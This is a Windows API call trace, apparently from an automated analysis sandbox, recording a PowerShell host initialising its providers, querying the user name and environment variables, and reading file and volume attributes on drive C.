	[0490.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0490.124] SetErrorMode (uMode=0x1) returned 0x1
	[0490.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d280 | out: lpFileInformation=0x24d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0490.125] SetErrorMode (uMode=0x1) returned 0x1
	[0490.126] GetLogicalDrives () returned 0x4
	[0490.126] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.127] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0490.127] SetErrorMode (uMode=0x1) returned 0x1
	[0490.128] CoTaskMemAlloc (cb=0x68) returned 0x1b922050
	[0490.128] CoTaskMemAlloc (cb=0x68) returned 0x1b921fe0
	[0490.128] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b922050, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d250, lpMaximumComponentLength=0x24d24c, lpFileSystemFlags=0x24d248, lpFileSystemNameBuffer=0x1b921fe0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d250*=0x9c354b42, lpMaximumComponentLength=0x24d24c*=0xff, lpFileSystemFlags=0x24d248*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0490.129] CoTaskMemFree (pv=0x1b922050) 
	[0490.129] CoTaskMemFree (pv=0x1b921fe0) 
	[0490.129] SetErrorMode (uMode=0x1) returned 0x1
	[0490.129] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0490.130] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.130] SetErrorMode (uMode=0x1) returned 0x1
	[0490.130] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d1f0 | out: lpFileInformation=0x24d1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0490.130] SetErrorMode (uMode=0x1) returned 0x1
	[0490.131] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.131] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0490.131] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0490.133] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.133] SetErrorMode (uMode=0x1) returned 0x1
	[0490.133] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d020 | out: lpFileInformation=0x24d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0490.134] SetErrorMode (uMode=0x1) returned 0x1
	[0490.134] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.134] SetErrorMode (uMode=0x1) returned 0x1
	[0490.134] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d020 | out: lpFileInformation=0x24d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0490.134] SetErrorMode (uMode=0x1) returned 0x1
	[0490.134] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0490.134] SetErrorMode (uMode=0x1) returned 0x1
	[0490.134] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d0c0 | out: lpFileInformation=0x24d0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0490.135] SetErrorMode (uMode=0x1) returned 0x1
	[0490.135] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0490.135] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0490.135] CoTaskMemFree (pv=0x1b92a760) 
	[0490.135] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0490.135] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0490.136] CoTaskMemFree (pv=0x3f47b0) 
	[0490.136] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd8478*="FileSystem", lpRawData=0x2fd8208) returned 1
	[0490.137] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.137] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.139] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0490.139] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0490.140] CoTaskMemFree (pv=0x1b92a760) 
	[0490.140] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0490.140] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0490.140] CoTaskMemFree (pv=0x3f47b0) 
	[0490.141] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fddcb8*="Function", lpRawData=0x2fdda48) returned 1
	[0490.144] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0490.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.144] CoTaskMemFree (pv=0x1b91f1c0) 
	[0490.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.966] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0490.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0491.665] CoTaskMemFree (pv=0x1b92a760) 
	[0491.665] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0491.666] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0491.666] CoTaskMemFree (pv=0x3f47b0) 
	[0491.666] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30004e0*="Registry", lpRawData=0x3000270) returned 1
	[0492.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.372] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0492.372] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0492.373] CoTaskMemFree (pv=0x1b92a760) 
	[0492.373] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0492.373] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0492.373] CoTaskMemFree (pv=0x3f47b0) 
	[0492.374] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30058f8*="Variable", lpRawData=0x3005688) returned 1
	[0492.403] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0492.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.403] CoTaskMemFree (pv=0x1b91f1c0) 
	[0492.406] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0492.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.406] CoTaskMemFree (pv=0x1b91f1c0) 
	[0492.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0493.275] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0493.275] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0493.276] CoTaskMemFree (pv=0x1b92a760) 
	[0493.276] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0493.276] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0493.276] CoTaskMemFree (pv=0x3f47b0) 
	[0493.276] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3019510*="Certificate", lpRawData=0x30192a0) returned 1
	[0493.829] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.830] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.833] GetLogicalDrives () returned 0x4
	[0493.834] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0493.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0493.835] CoTaskMemAlloc (cb=0x20e) returned 0x457d90
	[0493.835] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x457d90 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0493.835] CoTaskMemFree (pv=0x457d90) 
	[0493.837] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.837] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.837] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.837] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.855] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.855] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.857] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.857] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.858] SetErrorMode (uMode=0x1) returned 0x1
	[0493.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d110 | out: lpFileInformation=0x24d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0493.858] SetErrorMode (uMode=0x1) returned 0x1
	[0493.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.858] SetErrorMode (uMode=0x1) returned 0x1
	[0493.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d110 | out: lpFileInformation=0x24d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0493.858] SetErrorMode (uMode=0x1) returned 0x1
	[0493.859] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0493.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.859] CoTaskMemFree (pv=0x1b91f1c0) 
	[0493.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.867] SetErrorMode (uMode=0x1) returned 0x1
	[0493.867] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d3d0 | out: lpFileInformation=0x24d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0493.867] SetErrorMode (uMode=0x1) returned 0x1
	[0494.797] CoTaskMemAlloc (cb=0x804) returned 0x1b92a760
	[0494.797] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92a760, nSize=0x24d738 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d738) returned 0x1
	[0495.540] CoTaskMemFree (pv=0x1b92a760) 
	[0495.540] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0495.540] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d778 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d778) returned 1
	[0495.540] CoTaskMemFree (pv=0x3f47b0) 
	[0495.542] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30521f8*="Available", lpRawData=0x3051f88) returned 1
	[0496.351] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0496.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.352] CoTaskMemFree (pv=0x1b91f1c0) 
	[0496.353] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0496.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0496.353] CoTaskMemFree (pv=0x1b91f1c0) 
	[0496.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.360] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0496.360] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0496.360] CoTaskMemFree (pv=0x1b91f1c0) 
	[0496.360] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0496.360] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0496.360] CoTaskMemFree (pv=0x1b91f1c0) 
	[0496.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
